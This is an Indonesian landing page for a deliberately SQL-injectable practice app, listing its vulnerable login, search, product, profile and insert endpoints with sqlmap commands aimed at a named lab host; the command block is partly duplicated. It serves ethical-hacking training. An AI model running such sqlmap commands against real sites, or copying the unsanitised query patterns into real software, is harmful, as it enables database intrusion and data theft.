Selamat Datang di SQLi Lab
Aplikasi ini sengaja rentan terhadap SQL Injection untuk pembelajaran ethical hacking di lab pribadi.
Gunakan halaman-halaman berikut untuk latihan eksploitasi SQLi:
Endpoint Rentan
- Login SQLi POST — Autentikasi dengan concatenation langsung username & password
-
Pencarian Produk SQLi GET
— Parameter
?search=...tanpa sanitasi -
Detail Produk SQLi GET
— Parameter
?id=...numeric injection -
Profil User SQLi GET
— Parameter
?user_id=...tanpa validasi - Tambah Produk SQLi POST — Form INSERT dengan input langsung ke query
Contoh Penggunaan sqlmap
# Login (POST)
sqlmap -u "http://testing0.malikfajar.tech/login.php" --data="username=admin&password=test" --batch
# Pencarian (GET)
sqlmap -u "http://testing0.malikfajar.tech/search.php?search=laptop" --batch
# Detail produk (GET)
sqlmap -u "http://testing0.malikfajar.tech/product.php?id=1" --batch
# Profil user (GET)
sqlmap -u "http://testing0.malikfajar.tech/profile.php?user_id=1" --batch
# Tambah produk (POST)
sqlmap -u "http://testing0.malikfajar.tech/add_product.php" --data="name=test&price=100&description=test&stock=1" --batch
sqlmap -u "http://testing0.malikfajar.tech/login.php" --data="username=admin&password=test" --batch
# Pencarian (GET)
sqlmap -u "http://testing0.malikfajar.tech/search.php?search=laptop" --batch
# Detail produk (GET)
sqlmap -u "http://testing0.malikfajar.tech/product.php?id=1" --batch
# Profil user (GET)
sqlmap -u "http://testing0.malikfajar.tech/profile.php?user_id=1" --batch
# Tambah produk (POST)
sqlmap -u "http://testing0.malikfajar.tech/add_product.php" --data="name=test&price=100&description=test&stock=1" --batch
Setup
- Pastikan MySQL/MariaDB berjalan
- Jalankan install.php sekali
- Hapus install.php setelah selesai
- Mulai latihan di endpoint di atas